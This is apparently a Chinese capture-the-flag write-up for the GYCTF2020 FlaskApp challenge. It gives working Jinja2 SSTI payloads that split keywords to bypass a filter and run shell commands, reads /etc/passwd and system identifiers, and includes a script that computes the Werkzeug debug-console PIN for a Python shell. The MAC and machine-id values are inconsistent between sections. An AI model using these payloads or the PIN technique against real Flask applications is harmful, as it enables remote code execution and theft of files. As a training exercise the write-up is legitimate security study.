[GYCTF2020]FlaskApp

目录

进来有提示就看提示！摆烂的大动作！

计算pin码

我们可以查看/etc/passwd文件。使用如下命令

getattr(mod, ‘file’, None)flask目录下的app.py的绝对路径

当前电脑的MAC地址

机器的ID

总结：

进来有提示就看提示！摆烂的大动作！

入手点看来是失败了加密不可能失败，那就只能是解密失败了！解密失败后出现

debug模式，读取到了部分源码

@app.route('/decode',methods=['POST','GET'])
def decode():
    if request.values.get('text') :
        text = request.values.get("text")
        text_decode = base64.b64decode(text.encode())
        tmp = "结果 ： {0}".format(text_decode.decode())
        if waf(tmp) :
            flash("no no no !!")
            return redirect(url_for('decode'))
        res =  render_template_string(tmp)

根据代码我们知道加密后的代码经过waf后会被直接渲染，想起来这个名字是flask，那么可能存在ssti注入了！

验证一下吧！加密{{1+1}}得到e3sxKzF9fQ==然后解密一下得到2说明存在ssti注入

简单fuzz后发现过滤了flag、import、os、eval等关键词，我们用拆分bypass！

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("ls /").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

加密后解密

拼接拿flag

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /this_is_the_fl"+"ag.txt").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

计算pin码

看到可以登录控制台同时，但是不太了解这个debug控制台的pin值，百度一下。好像这个是预期解。。想要拿到PIN码必须知道：

1.运行app的用户名，读/etc/passwd

2.module name 一般固定为flask.app

3.getattr(app, "\_\_name\_\_", app.\_\_class\_\_.\_\_name\_\_)的结果。就是Flask

4.flask库下app.py的绝对路径，不是当前运行的app.py的路径，在debug模式下报错就能直接看见，该题为/usr/local/lib/python3.7/site-packages/flask/app.py

5.当前网络的mac地址的十进制数。通过文件/sys/class/net/eth0/address读取，eth0为当前使用的网卡，如果有多个网卡数字可能会变，这里为02:42:ae:00:c3:58，转十进制为 2485410382680

6.机器的id
对于非docker机每一个机器都会有自已唯一的id，linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i，有的系统没有这两个文件，windows的id获取跟linux也不同，假如是在win平台下读取不到上面两个文件，就去获取注册表中SOFTWARE\Microsoft\Cryptography的值。对于docker机则读取/proc/self/cgroup，序列号为1那行
1:name=systemd:/docker/210b2177689514627fab120347f7d1ea1e986bed6a9ef57504e2e3ac22e38c3c

我们可以查看/etc/passwd文件。使用如下命令

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /etc/passwd").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

{{{}.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__['open']('/etc/passwd').read()}}

这两种都可以读取，这样我们可以知道是flaskweb用户。

getattr(mod, ‘file’, None)flask目录下的app.py的绝对路径

报错信息告诉我们

/usr/local/lib/python3.7/site-packages/flask/app.py

当前电脑的MAC地址

我们可以读取/sys/class/net/eth0/address来获得mac的16进制：

{{{}.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__['open']('/sys/class/net/eth0/address').read()}}

得到a6:ac:19:45:f1:d8将其转10进制183258088600024许多工具都不准确，值得注意。可以采用本地用python跑的方式，在本地python输入

>>> print(int('a6ac1945f1d8',16))
183258088600024

机器的ID

读取/proc/self/cgroup获取get_machine_id()

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/proc/self/cgroup','r').read() }}{% endif %}{% endfor %}

1:name=systemd:/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podcc096863_49c3_4caa_b633_05615b822d2b.slice/docker-b6ff692442683c70ab69d01d5310a9aba4d3014fc147c329891658c0e2048332

我们要的是

1:name=systemd:/docker-b6ff692442683c70ab69d01d5310a9aba4d3014fc147c329891658c0e2048332

计算PIN码：

import hashlib
from itertools import chain
probably_public_bits = [
    'flaskweb',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
 
private_bits = [
    '2485377871838',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '4e2d4390ee2a9b57df253521f44301973efc74e35a300a02b4e509d60989543b'# get_machine_id(), /etc/machine-id
]
 
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
 
cookie_name = '__wzd' + h.hexdigest()[:20]
 
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
 
rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num
 
print(rv)

将得到的PIN码在Debug页面输入进入控制台，既可以执行python shell了：

os.popen('cat /this_is_the_flag.txt').read()

总结：

又见到了ssti注入，可以拼接绕过！

又学到了pin码计算，不要开启dubug模式

感谢buu提供优质的题，感谢勤劳的自己！